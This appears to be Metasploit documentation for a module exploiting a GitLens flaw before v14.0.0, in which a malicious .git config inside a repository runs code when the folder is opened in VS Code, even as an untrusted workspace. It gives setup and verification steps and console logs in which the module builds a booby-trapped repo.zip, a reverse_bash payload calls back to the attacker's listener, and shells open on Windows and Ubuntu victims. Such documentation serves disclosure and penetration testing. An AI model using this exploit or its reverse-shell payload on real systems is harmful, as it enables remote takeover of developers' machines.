## Vulnerable Application

GitKraken GitLens before v.14.0.0 allows an untrusted workspace to execute git
commands. A repo may include its own .git folder including a malicious config file to
execute arbitrary code.

Tested against VSCode 1.87.2 with GitLens 13.6.0 on Ubuntu 22.04 and Windows 10

### Install

Download the extension [gitlens-13.6.0.vsix](https://github.com/gitkraken/vscode-gitlens/releases/download/v13.6.0/gitlens-13.6.0.vsix)

1. In VSCode, go to extensions (left side, 4 blocks), click triple dots in top right corner, Auto Update Extensions -> None.
1. In VSCode, go to extensions (left side, 4 blocks), click triple dots in top right corner, install from vsix.

## Verification Steps

1. Install the extension
1. Start msfconsole
1. Do: `use exploit/multi/fileformat/gitlens_local_config_exec`
1. Do: `run`
1. Unzip the repo
1. Open the folder in Visual Studio Code
1. When prompted, select "No, I don't trust the authors"
1. Open the `README.md` file and put the cursor on the first line.
1. You should get a shell.

## Options

### README

The content of the `README.md` file. Defaults to `# Test`

## Scenarios

### VSCode 1.87.2 on Windows 10 Pro (22H2) with GitLens 13.6.0

```
[*] Processing gitlens.rb for ERB directives.
resource (gitlens.rb)> use exploit/multi/fileformat/gitlens_local_config_exec
[*] Using configured payload cmd/unix/reverse_bash
resource (gitlens.rb)> set target 1
target => 1
resource (gitlens.rb)> set lhost 192.168.10.147
lhost => 192.168.10.147
msf exploit(multi/fileformat/gitlens_local_config_exec) > exploit

[*] Started reverse TCP handler on 192.168.10.147:4444 
[+] repo.zip stored at /root/.msf4/local/repo.zip
[*] Waiting for shell
```

Unzip the repo, open the folder in Visual Studio Code. When prompted, select "No, I don't trust the authors". Open the `README.md` file and put the cursor on the first line.

```
[*] Sending stage (336 bytes) to 192.168.10.100
[*] Command shell session 1 opened (192.168.10.147:4444 -> 192.168.10.100:62807) at 2024-03-19 17:46:46 +0000


Shell Banner:
Microsoft Windows [Version 10.0.19045.4170]
-----
          

C:\Users\h00die\Desktop\repo>whoami
whoami
h00die

C:\Users\h00die\Desktop\repo>
```
### VSCode 1.87.2 on Windows 10 Pro (1809), utilizing remote connection to Ubuntu 22.04 with GitLens 13.6.0 installed

```
$ ./msfconsole -qr gitlens.rb 
[*] Processing gitlens.rb for ERB directives.
resource (gitlens.rb)> use exploit/multi/fileformat/gitlens_local_config_exec
[*] Using configured payload cmd/unix/reverse_bash
resource (gitlens.rb)> set lhost 192.168.10.147
lhost => 192.168.10.147
msf exploit(multi/fileformat/gitlens_local_config_exec) > exploit

[*] Started reverse TCP handler on 192.168.10.147:4444 
[+] repo.zip stored at /root/.msf4/local/repo.zip
[*] Waiting for shell
```

Unzip the repo, open the folder in Visual Studio Code. When prompted, select "No, I don't trust the authors". Open the `README.md` file and put the cursor on the first line.

```
[*] Command shell session 1 opened (192.168.10.147:4444 -> 192.168.10.147:53600) at 2024-03-19 18:26:04 +0000

[*] Command shell session 2 opened (192.168.10.147:4444 -> 192.168.10.147:53612) at 2024-03-19 18:26:06 +0000
id
uid=1000(notroot) gid=1000(notroot) groups=1000(notroot),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),119(docker)
```
